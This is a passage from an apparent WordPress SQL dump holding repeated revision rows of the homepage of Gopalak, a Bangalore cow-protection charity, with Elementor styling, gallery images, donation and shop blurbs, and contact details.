towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 15:17:09','2022-10-19 09:47:09','',1373,'https://gopalak.in/?p=1860',0,'revision','',0),(1861,1,'2022-10-19 15:17:09','2022-10-19 09:47:09','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 15:17:09','2022-10-19 09:47:09','',1373,'https://gopalak.in/?p=1861',0,'revision','',0),(1863,1,'2022-10-19 15:31:39','2022-10-19 10:01:39','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 15:31:39','2022-10-19 10:01:39','',1373,'https://gopalak.in/?p=1863',0,'revision','',0),(1864,1,'2022-10-19 15:31:39','2022-10-19 10:01:39','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.\n</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-19 15:31:39','2022-10-19 10:01:39','',1373,'https://gopalak.in/?p=1864',0,'revision','',0),(1865,1,'2022-10-19 15:31:39','2022-10-19 10:01:39','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is 